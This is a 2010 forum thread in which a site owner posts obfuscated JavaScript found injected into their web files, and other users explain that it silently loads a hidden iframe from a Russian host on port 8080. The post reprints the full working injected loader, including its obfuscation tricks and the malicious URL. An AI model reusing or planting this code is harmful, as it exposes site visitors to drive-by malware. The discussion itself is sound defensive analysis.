Found a dodgy script

SoundsGood · 4 Aug 2010 at 13:08

One of my websites seems to have been compromised as I've found a script added on to all the index.html files and .js files on the server. I'm just wondering if anyone could tell me what it has been doing to my visitors?

try{
var J3mbi4ltd;
function Pyyq9ov11b(){

if (typeof(document.body) == 'object'){
clearInterval(J3mbi4ltd);
}else{
return true;
}
Rep44jigd = '';
B7cl93owbrfi = ['src','h~e0i0gfhRtf'.replace(/[f~C0R]/g, ''), 'wLiEdEt!h!'.replace(/[\!EL\{J]/g, '')];
function Bl888ybmj(F4oyjug6eigg1,Wrf63p68pox7v,G5cufufhvjk){
return F4oyjug6eigg1.setAttribute(Wrf63p68pox7v,G5cufufhvjk);
}
function A511zkc(Fapg082uia){
return document.createElement(Fapg082uia);
}
Natxpwnvsr = 'p';
X0rkknejal = window.frames.length;
if (X0rkknejal<20) Natxpwnvsr = 'iEf:r/a+m/e:'.replace(/[\:\>E\+/]/g, '');
A58okcuvi380 = 'GB';
Gsseqkv3wyv7 = '1544444201';
Gpshvjo37oi = 'http://chaoticice.ru:8080/index.php?Xlzk1egit4zn1=1&pid=1&Xlzk1egit4zn1='+X0rkknejal;
H3plh7ewi5w = 1093499169;
Xudx56rxyt4 = A511zkc('div');
Xudx56rxyt4.id = 'S3whhtlqt';
Xudx56rxyt4.name = 'S3whhtlqt';
H3plh7ewi5w -= 546749584.5*2;
document.body.appendChild(Xudx56rxyt4);
Bv18u7lzq = 'H3plh7ewi5w';
Vdqv0ucv = new Array(Gpshvjo37oi, H3plh7ewi5w,H3plh7ewi5w);
Ey3k2lj1 = document.createElement(Natxpwnvsr);
for (Lh82mv6xml in B7cl93owbrfi){
Bl888ybmj(Ey3k2lj1,B7cl93owbrfi[Lh82mv6xml], Vdqv0ucv[Lh82mv6xml]);
}
document.getElementById('S3whhtlqt').appendChild(Ey3k2lj1);
}

J3mbi4ltd = window.setInterval(Pyyq9ov11b, '300');

}catch(Q9stx2c4myphm){}

m0rte · 4 Aug 2010 at 13:38

Looks like its creating an iFrame, dropping it into your page then talking to a dodgy russian site through it. Can't tell what data is being passed but it won't be anything good!

Dj_Jestar · 4 Aug 2010 at 13:59

Yeah, it's loading whatever is at the end of chaoticice.ru:8080/index.php and is probably snaffling your clients cookies.

GravyMonster · 4 Aug 2010 at 14:19

I'm seeing a lot of this going around in the last week. A few people I know have had their sites injected with crap taking visitors off to various Russian sites.

Incredibly annoying.

SoundsGood · 4 Aug 2010 at 20:11

Hmm not too bad then.. atleast it's probably not infectious.

Now to find out how it got there..

robmiller · 4 Aug 2010 at 20:13

Are you by any chance running an old version of phpBB/phpNuke/other such badly made-yet-popular software? That's usually the most common attack vector.

SoundsGood · 4 Aug 2010 at 20:43

There *was* a backup of a phpBB forum in a random folder.. but it wasn't setup with a database so I'm not sure if that's still exploitable. Deleted it now anyway